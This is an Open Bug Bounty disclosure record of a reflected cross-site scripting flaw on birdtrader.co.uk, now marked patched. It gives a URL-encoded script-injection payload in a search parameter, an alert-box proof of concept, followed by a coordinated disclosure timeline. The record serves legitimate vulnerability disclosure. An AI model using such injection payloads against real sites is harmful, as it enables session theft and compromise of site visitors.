birdtrader.co.uk XSS vulnerability

2016-09-20T05:42:00
ID OBB:182604
Type openbugbounty
Reporter malwrforensics
Modified 2016-10-21T17:37:00

Description

Vulnerable URL:
http://www.birdtrader.co.uk/parrots-for-sale?sstr=%22%3E%3Cscript%3Ealert(%27OPENBUGBOUNTY%27);%3C/script%3E%3Cdiv%20id=%221&ads;_cid=&ads;_place_name=&ads;_place_lat=0&ads;_place_long=0&ads;_dist=5&url;=maxdim
Details:

Description| Value
---|---
Patched:| Yes, at
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 336759
VIP website status:| No
Check birdtrader.co.uk SSL connection:| (Grade: A)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 20 September, 2016 05:42 GMT
Generic security notifications sent to website owner| 20 September, 2016 05:44 GMT
Vulnerability details disclosed by researcher| 4 October, 2016 06:12 GMT
Vulnerability patched by the website owner| 21 October, 2016 17:37 GMT